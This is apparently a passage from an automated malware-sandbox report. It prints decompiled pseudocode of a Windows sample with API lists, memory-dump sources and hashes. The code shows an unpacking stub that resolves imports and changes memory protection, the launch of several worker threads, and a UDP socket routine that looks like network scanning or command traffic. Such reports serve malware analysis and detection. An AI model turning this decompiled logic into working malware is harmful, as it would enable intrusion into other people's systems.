                                										asm("adc ebx, ebx");
                                									}
                                									if(__eflags < 0) {
                                										goto L18;
                                									} else {
                                										goto L30;
                                										do {
                                											do {
                                												L30:
                                												_t109 = _t108 + _t108;
                                												__eflags = _t109;
                                												if(_t109 == 0) {
                                													_t109 =  *_t134;
                                													_t134 = _t134 - 0xfffffffc;
                                													asm("adc ebx, ebx");
                                												}
                                												asm("adc ecx, ecx");
                                												_t108 = _t109 + _t109;
                                												__eflags = _t108;
                                											} while (__eflags >= 0);
                                											if(__eflags != 0) {
                                												break;
                                											}
                                											_t108 =  *_t134;
                                											_t134 = _t134 - 0xfffffffc;
                                											__eflags = _t134;
                                											asm("adc ebx, ebx");
                                										} while (_t134 >= 0);
                                										_t116 =  &(_t116[2]);
                                										__eflags = _t116;
                                										goto L36;
                                									}
                                								}
                                								_t39 =  *_t134;
                                								_t134 =  &(_t134[1]);
                                								_t40 = _t39 ^ 0xffffffff;
                                								__eflags = _t40;
                                								if(__eflags == 0) {
                                									_pop(_t135);
                                									_t127 = _t135;
                                									_t117 = 0x48f;
                                									goto L42;
                                									do {
                                										do {
                                											L42:
                                											_t41 =  *_t127;
                                											_t127 =  &(_t127[0]);
                                											__eflags = _t41 - 0xe8 - 1;
                                										} while (_t41 - 0xe8 > 1);
                                										__eflags =  *_t127 - 6;
                                									} while ( *_t127 != 6);
                                									asm("rol eax, 0x10");
                                									 *_t127 = ( *_t127 >> 8) - _t127 + _t135;
                                									__eflags =  &(_t127[1]);
                                									asm("loop 0xffffffdb");
                                									_t16 =  &(_t135[0x2d000]); // 0x2295000
                                									_t129 = _t16;
                                									while(1) {
                                										L45:
                                										_t51 =  *_t129;
                                										__eflags = _t51;
                                										if(_t51 == 0) {
                                											break;
                                										}
                                										_t17 =  &(_t129[4]); // 0x44
                                										_t115 = _t135 +  *_t17;
                                										_t132 =  &(_t129[8]);
                                										__eflags = _t132;
                                										_t137 = LoadLibraryA( &(_t51[ &(_t135[0x2dc00])]));
                                										while(1) {
                                											_t129 =  &(_t132[1]);
                                											__eflags =  *_t132;
                                											if(__eflags == 0) {
                                												goto L45;
                                											}
                                											_t117 = _t129;
                                											if(__eflags < 0) {
                                												_push( *_t129 & 0x0000ffff);
                                												_t129 =  &(_t129[2]);
                                												__eflags = _t129;
                                												_t117 = 0xaef24857;
                                											}
                                											asm("repne scasb");
                                											_t104 = GetProcAddress(_t137, _t129);
                                											__eflags = _t104;
                                											if(_t104 == 0) {
                                												ExitProcess();
                                											} else {
                                												 *_t115 = _t104;
                                												_t115 =  &(_t115[1]);
                                												continue;
                                											}
                                										}
                                									}
                                									_t130 =  &(_t129[4]);
                                									__eflags = _t130;
                                									_t24 = _t135 - 4; // 0x21e0ffc
                                									_t112 = _t24;
                                									while(1) {
                                										_t130 =  &(_t130[1]);
                                										_t54 = 0;
                                										__eflags = 0;
                                										if(0 == 0) {
                                											break;
                                										}
                                										__eflags = 0 - 0xef;
                                										if(0 > 0xef) {
                                											_t54 =  *_t130;
                                											_t130 =  &(_t130[2]);
                                										}
                                										_t112 = _t112 + _t54;
                                										asm("rol eax, 0x10");
                                										 *_t112 =  *_t112 + _t135;
                                									}
                                									_t138 = _t135[0x2dc25];
                                									_t28 = _t135 - 0x1000; // 0x21e0000
                                									_t131 = _t28;
                                									_push(0);
                                									VirtualProtect(_t131, 0x1000, "true", _t141);
                                									_t29 = _t131 + 0x1f7; // 0x21e01f7
                                									_t56 = _t29;
                                									 *_t56 =  *_t56 & 0x0000007f;
                                									_t30 =  &(_t56[0x28]);
                                									 *_t30 = _t56[0x28] & 0x0000007f;
                                									__eflags =  *_t30;
                                									_pop(_t57);
                                									_push(_t57);
                                									VirtualProtect(_t131, 0x1000, _t57, _t141); // executed
                                									asm("popad");
                                									_t60 =  &_v128;
                                									do {
                                										_push(0);
                                										__eflags = _t141 - _t60;
                                									} while (__eflags != 0);
                                									_v284 = 0;
                                									SetErrorMode(0x8002); // executed
                                									 *0x21e11ec(2,  &_v280, _t138); // executed
                                									 *0x21e1138(0x2219030);
                                									 *0x21e1138(0x2219018);
                                									 *0x21e1138(0x2219050); // executed
                                									E02213B60(_t117, __eflags); // executed
                                									_t68 = CreateThread(0, 0, E022127D4, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t68, 0, 0);
                                									_t70 = CreateThread(0, 0, E02209EEA, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t70, 0, 0);
                                									_t73 = CreateThread(0, 0, E0221392D, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t73, 0, 0);
                                									_t75 = CreateThread(0, 0, E02208962, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t75, 0, 0);
                                									_t77 = CreateThread(0, 0, E0220A2F5, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t77, 0, 0);
                                									_t80 = CreateThread(0, 0, E0220426A, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t80, 0, 0);
                                									_t82 = CreateThread(0, 0, E02207A3A, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t82, 0, 0);
                                									_t84 = CreateThread(0, 0, E022083C9, 0, 0,  &_v284); // executed
                                									E022041C6( &_v284, _t84, 0, 0);
                                									_t87 = CreateThread(0, 0, E0220878B, 0, 0,  &_v284); // executed
                                									_t88 = E022041C6( &_v284, _t87, 0, 0);
                                									while(1) {
                                										__eflags = 1;
                                										if(1 == 0) {
                                											break;
                                										}
                                										Sleep(0x200); // executed
                                									}
                                									return _t88;
                                								}
                                								_t137 = _t40 >> 1;
                                								goto L26;
                                							}
                                							_t108 =  *_t134;
                                							_t134 = _t134 - 0xfffffffc;
                                							asm("adc ebx, ebx");
                                							if(_t134 < 0) {
                                								goto L21;
                                							}
                                							L15:
                                							_t34 = _t34 - 1;
                                							_t106 = _t108 + _t108;
                                							if(_t106 == 0) {
                                								_t106 =  *_t134;
                                								_t134 = _t134 - 0xfffffffc;
                                								asm("adc ebx, ebx");
                                							}
                                							asm("adc eax, eax");
                                							_t107 = _t106 + _t106;
                                							if(_t107 == 0) {
                                								_t107 =  *_t134;
                                								_t134 = _t134 - 0xfffffffc;
                                								asm("adc ebx, ebx");
                                							}
                                							asm("adc eax, eax");
                                							_t108 = _t107 + _t107;
                                							_t156 = _t108;
                                							if(_t156 >= 0) {
                                								goto L15;
                                							}
                                						}
                                						L6:
                                						_t106 = _t106 + _t106;
                                						__eflags = _t106;
                                					} while (_t106 != 0);
                                				}
                                			}




















































                                0x02297ac0
                                0x02297ac0
                                0x02297ac1
                                0x02297ac6
                                0x02297ac6
                                0x02297acc
                                0x02297acd
                                0x02297ae2
                                0x02297ae2
                                0x02297ae4
                                0x02297ae7
                                0x02297ae9
                                0x02297ae9
                                0x02297ad8
                                0x02297ada
                                0x02297adb
                                0x02297add
                                0x02297add
                                0x00000000
                                0x02297add
                                0x02297aeb
                                0x02297af0
                                0x02297af0
                                0x02297af2
                                0x02297af4
                                0x02297af6
                                0x02297af9
                                0x02297af9
                                0x02297afb
                                0x02297afd
                                0x02297afd
                                0x02297aff
                                0x00000000
                                0x00000000
                                0x02297b01
                                0x02297b01
                                0x02297b2b
                                0x02297b2b
                                0x02297b2d
                                0x02297b2d
                                0x02297b30
                                0x02297b43
                                0x02297b43
                                0x02297b45
                                0x02297b47
                                0x02297b49
                                0x02297b4c
                                0x02297b4c
                                0x02297b4e
                                0x02297b4e
                                0x02297b1c
                                0x02297b1c
                                0x02297b1c
                                0x02297b1e
                                0x02297b20
                                0x02297b22
                                0x02297b25
                                0x02297b25
                                0x02297b27
                                0x02297b7d
                                0x02297b7d
                                0x02297b83
                                0x02297b86
                                0x02297b89
                                0x02297b8c
                                0x02297b9c
                                0x02297b9c
                                0x02297b9e
                                0x02297ba1
                                0x02297ba3
                                0x02297ba6
                                0x02297ba6
                                0x02297ba6
                                0x02297bab
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x02297b8e
                                0x02297b8e
                                0x02297b8e
                                0x02297b90
                                0x02297b91
                                0x02297b93
                                0x02297b94
                                0x02297b94
                                0x02297b94
                                0x00000000
                                0x02297b97
                                0x02297b50
                                0x02297b51
                                0x02297b51
                                0x02297b53
                                0x02297b55
                                0x02297b57
                                0x02297b5a
                                0x02297b5a
                                0x02297b5c
                                0x00000000
                                0x02297b5e
                                0x00000000
                                0x02297b5e
                                0x02297b5e
                                0x02297b5e
                                0x02297b5e
                                0x02297b5e
                                0x02297b60
                                0x02297b62
                                0x02297b64
                                0x02297b67
                                0x02297b67
                                0x02297b69
                                0x02297b6b
                                0x02297b6b
                                0x02297b6b
                                0x02297b6f
                                0x00000000
                                0x00000000
                                0x02297b71
                                0x02297b73
                                0x02297b73
                                0x02297b76
                                0x02297b76
                                0x02297b7a
                                0x02297b7a
                                0x00000000
                                0x02297b7a
                                0x02297b5c
                                0x02297b35
                                0x02297b37
                                0x02297b38
                                0x02297b38
                                0x02297b3b
                                0x02297bb2
                                0x02297bb3
                                0x02297bb5
                                0x02297bb5
                                0x02297bba
                                0x02297bba
                                0x02297bba
                                0x02297bba
                                0x02297bbc
                                0x02297bbf
                                0x02297bbf
                                0x02297bc3
                                0x02297bc3
                                0x02297bd1
                                0x02297bdd
                                0x02297bdf
                                0x02297be4
                                0x02297be6
                                0x02297be6
                                0x02297bec
                                0x02297bec
                                0x02297bee
                                0x02297bee
                                0x02297bf0
                                0x00000000
                                0x00000000
                                0x02297bf2
                                0x02297bfc
                                0x02297bff
                                0x02297bff
                                0x02297c08
                                0x02297c09
                                0x02297c0b
                                0x02297c0c
                                0x02297c0e
                                0x00000000
                                0x00000000
                                0x02297c10
                                0x02297c12
                                0x02297c18
                                0x02297c19
                                0x02297c19
                                0x02297c1a
                                0x02297c1a
                                0x02297c1d
                                0x02297c26
                                0x02297c26
                                0x02297c28
                                0x02297c31
                                0x02297c2a
                                0x02297c2a
                                0x02297c2c
                                0x00000000
                                0x02297c2c
                                0x02297c28
                                0x02297c09
                                0x02297c37
                                0x02297c37
                                0x02297c3a
                                0x02297c3a
                                0x02297c3d
                                0x02297c41
                                0x02297c42
                                0x02297c42
                                0x02297c44
                                0x00000000
                                0x00000000
                                0x02297c46
                                0x02297c48
                                0x02297c60
                                0x02297c63
                                0x02297c63
                                0x02297c4a
                                0x02297c50
                                0x02297c57
                                0x02297c57
                                0x02297c68
                                0x02297c6e
                                0x02297c6e
                                0x02297c79
                                0x02297c7f
                                0x02297c81
                                0x02297c81
                                0x02297c87
                                0x02297c8a
                                0x02297c8a
                                0x02297c8a
                                0x02297c8e
                                0x02297c8f
                                0x02297c94
                                0x02297c97
                                0x02297c98
                                0x02297c9c
                                0x02297c9c
                                0x02297c9e
                                0x02297c9e
                                0x02214570
                                0x0221457f
                                0x0221458e
                                0x02214599
                                0x022145a4
                                0x022145af
                                0x022145b5
                                0x022145d2
                                0x022145d9
                                0x022145f9
                                0x02214600
                                0x02214620
                                0x02214627
                                0x02214647
                                0x0221464e
                                0x0221466e
                                0x02214675
                                0x02214695
                                0x0221469c
                                0x022146bc
                                0x022146c3
                                0x022146e3
                                0x022146ea
                                0x0221470a
                                0x02214711
                                0x02214719
                                0x0221471e
                                0x02214720
                                0x00000000
                                0x00000000
                                0x02214727
                                0x02214727
                                0x02214732
                                0x02214732
                                0x02297b3f
                                0x00000000
                                0x02297b3f
                                0x02297b03
                                0x02297b05
                                0x02297b08
                                0x02297b0a
                                0x00000000
                                0x00000000
                                0x02297b0c
                                0x02297b0c
                                0x02297b0d
                                0x02297b0f
                                0x02297b11
                                0x02297b13
                                0x02297b16
                                0x02297b16
                                0x02297b18
                                0x02297af0
                                0x02297af2
                                0x02297af4
                                0x02297af6
                                0x02297af9
                                0x02297af9
                                0x02297afb
                                0x02297afd
                                0x02297afd
                                0x02297aff
                                0x00000000
                                0x00000000
                                0x02297aff
                                0x02297ade
                                0x02297ade
                                0x02297ade
                                0x02297ade
                                0x02297ae9

                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 02297C02
                                • GetProcAddress.KERNEL32(?,02294FF9), ref: 02297C20
                                • ExitProcess.KERNEL32(?,02294FF9), ref: 02297C31
                                • VirtualProtect.KERNELBASE(021E0000,00001000,?,?,00000000), ref: 02297C7F
                                • VirtualProtect.KERNELBASE(021E0000,00001000), ref: 02297C94
                                Memory Dump Source
                                • Source File: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                • String ID:
                                • API String ID: 1996367037-0
                                • Opcode ID: 34b853cae9afbfdbdb34981e1b9c97488b9785e83228375c34d91f8bf9a1a345
                                • Instruction ID: 976d803ad2beddd0c65e7ab4e38cf3054685446bee40e46d171a7ea34b1a932e
                                • Opcode Fuzzy Hash: 34b853cae9afbfdbdb34981e1b9c97488b9785e83228375c34d91f8bf9a1a345
                                • Instruction Fuzzy Hash: A151D2F2A742134ADB209EF8CCD07A5F7A4EB41224B180779C6E6C73C9FBA45806C764
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E022084C1(void* __ecx, void* __eflags, intOrPtr* _a4) {
                                				long _v8;
                                				void _v4231;
                                				char _v4232;
                                				long _v4236;
                                				long _v4240;
                                				void* _v4244;
                                				short _v4246;
                                				intOrPtr _v4250;
                                				intOrPtr _v4254;
                                				char _v4256;
                                				short _v4258;
                                				char _v4260;
                                				long _v4264;
                                				void* _t64;
                                				long _t70;
                                				long _t73;
                                				intOrPtr _t98;
                                				void* _t108;
                                				void* _t111;
                                				void* _t113;
                                				void* _t115;
                                				void* _t116;
                                				void* _t117;
                                				void* _t118;
                                
                                				_t113 = __eflags;
                                				E02218060(0x10a4, __ecx);
                                				_v4244 = _a4;
                                				_v4232 = 0;
                                				memset( &_v4231, 0, 0x41f << 2);
                                				asm("stosw");
                                				asm("stosb");
                                				_v4236 = 0;
                                				InterlockedIncrement(0x22194c8);
                                				_v4260 = 0;
                                				_v4258 = 0;
                                				_v4254 = 0;
                                				_v4250 = 0;
                                				_v4246 = 0;
                                				_v4264 = 0;
                                				_v4240 = 0;
                                				_v8 = 0;
                                				_v4260 = 2;
                                				_v4258 =  *0x21e11b8( *((intOrPtr*)(_v4244 + 4)));
                                				E0221772B( &_v4256, _v4244, "true");
                                				_t64 = E0220719B( &_v4240, _t113,  &_v4260,  &_v4240,  &_v8, 0); // executed
                                				_t111 = _t108 + 0x28;
                                				if(_t64 == 0) {
                                					__eflags =  *0x22194d0 - 0x32;
                                					if( *0x22194d0 > 0x32) {
                                						_t98 =  *((intOrPtr*)(_v4244 + 0xc)) - 1;
                                						__eflags = _t98;
                                						 *((intOrPtr*)(_v4244 + 0xc)) = _t98;
                                					}
                                					 *(_v4244 + 0x10) = 0;
                                					L18:
                                					InterlockedDecrement(0x22194c8);
                                					_push(0);
                                					RtlExitUserThread();
                                					return 0;
                                				}
                                				_v4264 = 1;
                                				 *((intOrPtr*)(_v4244 + 0xc)) =  *((intOrPtr*)(_v4244 + 0xc)) + 1;
                                				_t70 = GetTickCount();
                                				_t92 = _v4244;
                                				 *(_v4244 + 0x10) = _t70;
                                				_t115 = _v4240 -  *0x2287da0; // 0x54
                                				if(_t115 < 0) {
                                					_t92 =  &_v4260;
                                					E0220719B( &_v4260, _t115,  &_v4260,  &_v4240, 0, 1);
                                					_t111 = _t111 + 0x10;
                                				}
                                				_t116 = _v4240 -  *0x2287da0; // 0x54
                                				if(_t116 == 0) {
                                					_t117 = _v8 -  *0x22882b0; // 0x0
                                					if(_t117 < 0) {
                                						_t92 =  *_v4244;
                                						E02207F11( *_v4244,  *((intOrPtr*)(_v4244 + 4)));
                                						_t111 = _t111 + 8;
                                					}
                                					_t118 = _v8 -  *0x22882b0; // 0x0
                                					if(_t118 > 0) {
                                						_t92 =  *((intOrPtr*)(_v4244 + 4));
                                						E022082B6(_t118,  *_v4244,  *((intOrPtr*)(_v4244 + 4)));
                                						_t111 = _t111 + 8;
                                					}
                                				}
                                				_t119 =  *0x22194cc;
                                				if( *0x22194cc == 0) {
                                					 *0x22194cc = 1;
                                					_t92 =  &_v4260;
                                					_t73 = E02207523( &_v4260, _t119,  &_v4260);
                                					_t111 = _t111 + 4;
                                					_v4236 = _t73;
                                					if(_v4236 <= 0) {
                                						 *0x22194cc = 0;
                                					} else {
                                						 *0x22194cc = _v4236;
                                					}
                                				}
                                				_t121 =  *0x22194d0 - 0x3d4;
                                				if( *0x22194d0 < 0x3d4) {
                                					E02206EBE(_t92, _t121,  &_v4260);
                                				}
                                				goto L18;
                                			}



























                                0x022084c1
                                0x022084c9
                                0x022084d2
                                0x022084d8
                                0x022084ec
                                0x022084ee
                                0x022084f0
                                0x022084f1
                                0x02208500
                                0x02208506
                                0x02208511
                                0x02208517
                                0x0220851d
                                0x02208523
                                0x0220852a
                                0x02208534
                                0x0220853e
                                0x02208545
                                0x0220855f
                                0x02208576
                                0x02208592
                                0x02208597
                                0x0220859c
                                0x022086ba
                                0x022086c1
                                0x022086cc
                                0x022086cc
                                0x022086d5
                                0x022086d5
                                0x022086de
                                0x022086e5
                                0x022086ea
                                0x022086f0
                                0x022086f2
                                0x022086fe
                                0x022086fe
                                0x022085a2
                                0x022085be
                                0x022085c1
                                0x022085c7
                                0x022085cd
                                0x022085d6
                                0x022085dc
                                0x022085e9
                                0x022085f0
                                0x022085f5
                                0x022085f5
                                0x022085fe
                                0x02208604
                                0x02208609
                                0x0220860f
                                0x02208622
                                0x02208625
                                0x0220862a
                                0x0220862a
                                0x02208630
                                0x02208636
                                0x0220863e
                                0x0220864c
                                0x02208651
                                0x02208651
                                0x02208636
                                0x02208654
                                0x0220865b
                                0x0220865d
                                0x02208667
                                0x0220866e
                                0x02208673
                                0x02208676
                                0x02208683
                                0x02208693
                                0x02208685
                                0x0220868b
                                0x0220868b
                                0x02208683
                                0x0220869d
                                0x022086a7
                                0x022086b0
                                0x022086b5
                                0x00000000

                                APIs
                                • InterlockedIncrement.KERNEL32(022194C8), ref: 02208500
                                • htons.WS2_32(00000000), ref: 02208559
                                  • Part of subcall function 0220719B: socket.WS2_32(00000002,00000002,00000011), ref: 02207203
                                  • Part of subcall function 0220719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 0220726D
                                  • Part of subcall function 0220719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 02207345
                                • GetTickCount.KERNEL32 ref: 022085C1
                                  • Part of subcall function 0220719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 02207374
                                  • Part of subcall function 0220719B: closesocket.WS2_32(?), ref: 0220750D
                                • InterlockedDecrement.KERNEL32(022194C8), ref: 022086EA
                                • RtlExitUserThread.NTDLL(00000000), ref: 022086F2
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
                                • String ID:
                                • API String ID: 1469894868-0
                                • Opcode ID: 4deb6a5064391214a24829407daea3e769dc3bfc1633af82a83d3ad87e157e09
                                • Instruction ID: 4f63524b9fcd65f1b1febf0248613b96beafb40ad580d74690c794cac029dbc2
                                • Opcode Fuzzy Hash: 4deb6a5064391214a24829407daea3e769dc3bfc1633af82a83d3ad87e157e09
                                • Instruction Fuzzy Hash: 37518AB4D10258DFDB20CBA0D894BEAB3B5BB04304F4085D8E18DA7289DBB19AC4CF52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 59%
                                			E022127D4() {
                                				char _v8;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				char _v32;
                                				char _v36;
                                				void* _v40;
                                				void* _t24;
                                				intOrPtr _t53;
                                				intOrPtr _t54;
                                				void* _t55;
                                
                                				_push(0xffffffff);
                                				_push(0x2204028);
                                				_push(0x2218090);
                                				_push( *[fs:0x0]);
                                				 *[fs:0x0] = _t53;
                                				_t54 = _t53 + 0xffffffec;
                                				_v28 = _t54;
                                				_v40 = GlobalAlloc(0x40, 0x14000);
                                				_v32 = 0;
                                				_v36 = 0;
                                				_v8 = 0;
                                				_t24 = E0220C89A(_v40); // executed
                                				_t55 = _t54 + 4;
                                				if(_t24 != 0) {
                                					E0221772B(E0228D760, _v40, 0x2000);
                                					_t55 = _t55 + 0xc;
                                				}
                                				GlobalFree(_v40); // executed
                                				 *0x228eed3 = 0;
                                				if( *E0228D760 == 0) {
                                					L10:
                                					_v8 = 0xffffffff;
                                				} else {
                                					_v36 =  *0x21e107c;
                                					_t41 = _v36;
                                					if(E0221277F(_v36, E0228D760, 0x22222222, _v36) != 0) {
                                						_v36 =  *0x21e1078;
                                						if(E0221277F(_t41, E0228D760, 0x33333333, _v36) != 0) {
                                							E0221772B(0x2290760, E02203DAC, 0x30);
                                							_v36 =  *0x21e1100;
                                							E0221277F( *0x21e1100, 0x2290760, 0x22222222, _v36);
                                							_v36 =  *0x21e116c;
                                							E0221277F(_v36, 0x2290760, 0x33333333, _v36);
                                							while(1 != 0) {
                                								E02212514(); // executed
                                								Sleep(0x2800);
                                							}
                                							goto L10;
                                						} else {
                                							_v8 = 0xffffffff;
                                						}
                                					} else {
                                						_v8 = 0xffffffff;
                                					}
                                				}
                                				_push(0);
                                				RtlExitUserThread();
                                				 *[fs:0x0] = _v20;
                                				return 0;
                                			}













                                0x022127d7
                                0x022127d9
                                0x022127de
                                0x022127e9
                                0x022127ea
                                0x022127f1
                                0x022127f7
                                0x02212807
                                0x0221280a
                                0x02212811
                                0x02212818
                                0x02212823
                                0x02212828
                                0x0221282d
                                0x0221283d
                                0x02212842
                                0x02212842
                                0x02212849
                                0x0221284f
                                0x0221285d
                                0x0221292c
                                0x0221292c
                                0x02212863
                                0x02212868
                                0x0221286b
                                0x02212883
                                0x02212897
                                0x022128b2
                                0x022128cc
                                0x022128da
                                0x022128eb
                                0x022128f8
                                0x02212909
                                0x02212911
                                0x0221291a
                                0x02212924
                                0x02212924
                                0x00000000
                                0x022128b4
                                0x022128b4
                                0x022128b4
                                0x02212885
                                0x02212885
                                0x02212885
                                0x02212883
                                0x02212945
                                0x02212947
                                0x02212952
                                0x0221295f

                                APIs
                                • GlobalAlloc.KERNEL32(00000040,00014000), ref: 02212801
                                  • Part of subcall function 0220C89A: MapViewOfFile.KERNELBASE(00000264,00000006,00000000,00000000,00015400), ref: 0220C8D1
                                  • Part of subcall function 0220C89A: UnmapViewOfFile.KERNEL32(00000000), ref: 0220C900
                                • GlobalFree.KERNEL32(?), ref: 02212849
                                • Sleep.KERNEL32(00002800), ref: 02212924
                                • RtlExitUserThread.NTDLL(00000000), ref: 02212947
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
                                • String ID:
                                • API String ID: 2983513495-0
                                • Opcode ID: 99ba3db08990cf3ac4fa300e53dbd7bf6fe17ce0effc4d48d038caaccf136850
                                • Instruction ID: 72f668764d81cb2630627c56d466aaa37808806ef9c9ffdf36039935c5a48bc7
                                • Opcode Fuzzy Hash: 99ba3db08990cf3ac4fa300e53dbd7bf6fe17ce0effc4d48d038caaccf136850
                                • Instruction Fuzzy Hash: 3731BF70E60318EBEB10DBE4ED45FDA77E4AB69720F144328F80566288E7B65900CB62
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E004015E1(struct _IO_FILE* _a4, long _a8, int _a12) {
                                				void* _t7;
                                				int _t11;
                                				int _t13;
                                				void* _t15;
                                				signed int _t16;
                                				signed int _t17;
                                				void* _t24;
                                				int _t27;
                                
                                				_t27 = _a12;
                                				_t7 = malloc(_t27);
                                				_t16 = _t27;
                                				_t15 = _t7;
                                				_t24 = _t15;
                                				_t17 = _t16 >> 2;
                                				memset(_t24 + _t17, memset(_t24, 0, _t17 << 2), (_t16 & 0x00000003) << 0);
                                				_t11 = fseek(_a4, _a8, 0); // executed
                                				if(_t11 == 0xffffffff) {
                                					L2:
                                					free(_t15);
                                					return 0;
                                				}
                                				_t13 = fread(_t15, 1, _t27, _a4); // executed
                                				if(_t13 == _t27) {
                                					return _t15;
                                				}
                                				goto L2;
                                			}











                                0x004015e3
                                0x004015e9
                                0x004015ef
                                0x004015f1
                                0x004015f7
                                0x004015ff
                                0x0040160d
                                0x0040160f
                                0x0040161b
                                0x00401632
                                0x00401633
                                0x00000000
                                0x0040163a
                                0x00401625
                                0x00401630
                                0x00000000
                                0x0040163e
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: freadfreefseekmalloc
                                • String ID:
                                • API String ID: 3471334931-0
                                • Opcode ID: 44ac79e4b0f1bcf4dc7ae02b0996f741e120785c0b30b0b1d50e8aeaaf7d3969
                                • Instruction ID: 1d382d1c7b83fd7ead5be8ccf3c43d9436ab592656dc9468087f722dc2080258
                                • Opcode Fuzzy Hash: 44ac79e4b0f1bcf4dc7ae02b0996f741e120785c0b30b0b1d50e8aeaaf7d3969
                                • Instruction Fuzzy Hash: EBF0BB31304211AFDB148F389D5896B7696EB88711F144D3AF316E13E0D6768C15C76A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 18%
                                			E00401588(struct _IO_FILE* __eax, intOrPtr _a4, void* _a8) {
                                				int _t9;
                                				signed int _t14;
                                				struct _IO_FILE* _t22;
                                
                                				__imp___wfopen(_a4, 0x403040); // executed
                                				_t22 = __eax;
                                				if(__eax != 0) {
                                					fseek(__eax, 0xffffffd0, 2); // executed
                                					_t14 = 0xc;
                                					_push(_t22);
                                					_push(0x30);
                                					memset(_a8, 0, _t14 << 2);
                                					_push(1);
                                					_pop(0);
                                					_t9 = fread(_a8, 0, ??, ??); // executed
                                					if(_t9 != 0x30) {
                                					}
                                					fclose(_t22);
                                					return 0;
                                				} else {
                                					return __eax;
                                				}
                                			}






                                0x00401592
                                0x00401598
                                0x0040159e
                                0x004015a8
                                0x004015b4
                                0x004015b7
                                0x004015b8
                                0x004015ba
                                0x004015bc
                                0x004015be
                                0x004015c4
                                0x004015d0
                                0x004015d0
                                0x004015d5
                                0x004015e0
                                0x004015a1
                                0x004015a1
                                0x004015a1

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: _wfopenfclosefreadfseek
                                • String ID:
                                • API String ID: 37012567-0
                                • Opcode ID: 58a0d6c72bc6984039d2a2ecf4c9038545cb79c90ea8f2b82e46258bfba3e950
